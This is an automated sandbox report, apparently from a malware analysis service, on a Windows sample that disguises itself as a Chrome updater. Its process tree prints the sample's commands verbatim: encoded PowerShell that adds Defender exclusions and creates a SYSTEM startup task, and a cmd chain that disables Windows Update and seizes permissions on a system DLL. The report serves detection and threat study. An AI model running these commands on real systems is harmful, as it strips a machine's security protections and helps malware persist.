Analysis

  • max time kernel
    149s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2022 22:38

General

  • Target

    tmp.exe

  • Size

    1.8MB

  • MD5

    6691c3106d5319f108114a48f5177396

  • SHA1

    1ce92f03b5e7bd1c1d591141693f6e0261f3afee

  • SHA256

    375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97

  • SHA512

    19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7

  • SSDEEP

    49152:+1rLSuOMv2pORqIwpn3AcRs3gzAiYSWTqP7:K3O02WyDQDDTqP

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:680
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:4728
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:1668
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1708
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:3100
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:624
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:2448
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:1460
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:4672
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:3484
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:1152
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4804
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4884
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:4056
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:2180
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:440
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:920
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:1432
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:60
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:4164
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:1340
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:1196
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:2788
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:2296
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAGsAQQBaAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGIAQQBCAGsAQQBDAE0AQQBQAGcAQQA9ACIAJwApACAAPAAjAG8AZwBrAHYAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGoAcAB5ACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAeABsAHMAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBpAGYAegAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAdQByACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAGUAcAB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
                    2⤵
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4108
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHkAZwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbABkACMAPgA="
                  1⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2288
                  • C:\Program Files\Google\Chrome\updater.exe
                    "C:\Program Files\Google\Chrome\updater.exe"
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:1972
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="
                      3⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3736
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4000
                      • C:\Windows\system32\sc.exe
                        sc stop UsoSvc
                        4⤵
                        • Launches sc.exe
                        PID:4968
                      • C:\Windows\system32\sc.exe
                        sc stop WaaSMedicSvc
                        4⤵
                        • Launches sc.exe
                        PID:3912
                      • C:\Windows\system32\sc.exe
                        sc stop wuauserv
                        4⤵
                        • Launches sc.exe
                        PID:4900
                      • C:\Windows\system32\sc.exe
                        sc stop bits
                        4⤵
                        • Launches sc.exe
                        PID:2168
                      • C:\Windows\system32\sc.exe
                        sc stop dosvc
                        4⤵
                        • Launches sc.exe
                        PID:900
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                        4⤵
                        • Modifies registry key
                        PID:4660
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                        4⤵
                        • Modifies registry key
                        PID:2412
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                        4⤵
                        • Modifies registry key
                        PID:2396
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                        4⤵
                        • Modifies registry key
                        PID:3084
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                        4⤵
                        • Modifies registry key
                        PID:4460
                      • C:\Windows\system32\takeown.exe
                        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                        4⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:1540
                      • C:\Windows\system32\icacls.exe
                        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                        4⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:4652
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:3756
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:4648
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:3184
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:5064
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                        4⤵
                          PID:4688
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                          4⤵
                            PID:3472
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                            4⤵
                              PID:1980
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                              4⤵
                                PID:1668
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                4⤵
                                  PID:4784
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                  4⤵
                                    PID:3760
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    4⤵
                                      PID:4596
                                  • C:\Windows\System32\conhost.exe
                                    C:\Windows\System32\conhost.exe "bdapyxxyq"
                                    3⤵
                                      PID:2440

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Persistence

                                Modify Existing Service

                                2
                                T1031

                                Defense Evasion

                                Modify Registry

                                2
                                T1112

                                Impair Defenses

                                1
                                T1562

                                File Permissions Modification

                                1
                                T1222

                                Discovery

                                Query Registry

                                1
                                T1012

                                System Information Discovery

                                2
                                T1082

                                Impact

                                Service Stop

                                1
                                T1489

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Program Files\Google\Chrome\updater.exe
                                  Filesize

                                  1.8MB

                                  MD5

                                  6691c3106d5319f108114a48f5177396

                                  SHA1

                                  1ce92f03b5e7bd1c1d591141693f6e0261f3afee

                                  SHA256

                                  375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97

                                  SHA512

                                  19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7

                                • C:\Program Files\Google\Chrome\updater.exe
                                  Filesize

                                  1.8MB

                                  MD5

                                  6691c3106d5319f108114a48f5177396

                                  SHA1

                                  1ce92f03b5e7bd1c1d591141693f6e0261f3afee

                                  SHA256

                                  375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97

                                  SHA512

                                  19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                  Filesize

                                  2KB

                                  MD5

                                  d85ba6ff808d9e5444a4b369f5bc2730

                                  SHA1

                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                  SHA256

                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                  SHA512

                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  944B

                                  MD5

                                  5f0ddc7f3691c81ee14d17b419ba220d

                                  SHA1

                                  f0ef5fde8bab9d17c0b47137e014c91be888ee53

                                  SHA256

                                  a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

                                  SHA512

                                  2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                  Filesize

                                  2KB

                                  MD5

                                  6cf293cb4d80be23433eecf74ddb5503

                                  SHA1

                                  24fe4752df102c2ef492954d6b046cb5512ad408

                                  SHA256

                                  b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                  SHA512

                                  0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  2238871af228384f4b8cdc65117ba9f1

                                  SHA1

                                  2a200725f1f32e5a12546aa7fd7a8c5906757bd1

                                  SHA256

                                  daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

                                  SHA512

                                  1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

                                • memory/60-161-0x0000000000000000-mapping.dmp
                                • memory/440-158-0x0000000000000000-mapping.dmp
                                • memory/624-144-0x0000000000000000-mapping.dmp
                                • memory/680-137-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/680-136-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/680-135-0x000001DA41AB0000-0x000001DA41AD2000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/680-133-0x0000000000000000-mapping.dmp
                                • memory/900-194-0x0000000000000000-mapping.dmp
                                • memory/920-159-0x0000000000000000-mapping.dmp
                                • memory/1152-150-0x0000000000000000-mapping.dmp
                                • memory/1196-164-0x0000000000000000-mapping.dmp
                                • memory/1340-163-0x0000000000000000-mapping.dmp
                                • memory/1368-139-0x0000000000000000-mapping.dmp
                                • memory/1432-160-0x0000000000000000-mapping.dmp
                                • memory/1460-146-0x0000000000000000-mapping.dmp
                                • memory/1540-201-0x0000000000000000-mapping.dmp
                                • memory/1668-141-0x0000000000000000-mapping.dmp
                                • memory/1668-213-0x0000000000000000-mapping.dmp
                                • memory/1708-142-0x0000000000000000-mapping.dmp
                                • memory/1972-204-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/1972-197-0x000000001C5B0000-0x000000001C5C2000-memory.dmp
                                  Filesize

                                  72KB

                                • memory/1972-188-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/1972-171-0x0000000000000000-mapping.dmp
                                • memory/1972-175-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/1980-212-0x0000000000000000-mapping.dmp
                                • memory/2168-193-0x0000000000000000-mapping.dmp
                                • memory/2180-157-0x0000000000000000-mapping.dmp
                                • memory/2288-173-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/2288-169-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/2296-166-0x0000000000000000-mapping.dmp
                                • memory/2396-198-0x0000000000000000-mapping.dmp
                                • memory/2412-196-0x0000000000000000-mapping.dmp
                                • memory/2440-217-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/2440-205-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/2440-203-0x0000024F92670000-0x0000024F92677000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/2448-145-0x0000000000000000-mapping.dmp
                                • memory/2788-165-0x0000000000000000-mapping.dmp
                                • memory/3084-199-0x0000000000000000-mapping.dmp
                                • memory/3100-143-0x0000000000000000-mapping.dmp
                                • memory/3184-208-0x0000000000000000-mapping.dmp
                                • memory/3472-211-0x0000000000000000-mapping.dmp
                                • memory/3484-148-0x0000000000000000-mapping.dmp
                                • memory/3736-182-0x0000024CEEDF0000-0x0000024CEEDFA000-memory.dmp
                                  Filesize

                                  40KB

                                • memory/3736-174-0x0000000000000000-mapping.dmp
                                • memory/3736-181-0x0000024CEEE30000-0x0000024CEEE4C000-memory.dmp
                                  Filesize

                                  112KB

                                • memory/3736-183-0x0000024CF0180000-0x0000024CF019A000-memory.dmp
                                  Filesize

                                  104KB

                                • memory/3736-184-0x0000024CEEE00000-0x0000024CEEE08000-memory.dmp
                                  Filesize

                                  32KB

                                • memory/3736-185-0x0000024CEEE50000-0x0000024CEEE56000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/3736-186-0x0000024CF0160000-0x0000024CF016A000-memory.dmp
                                  Filesize

                                  40KB

                                • memory/3736-187-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/3736-178-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
                                  Filesize

                                  10.8MB

                                • memory/3736-179-0x0000024CEEE10000-0x0000024CEEE2C000-memory.dmp
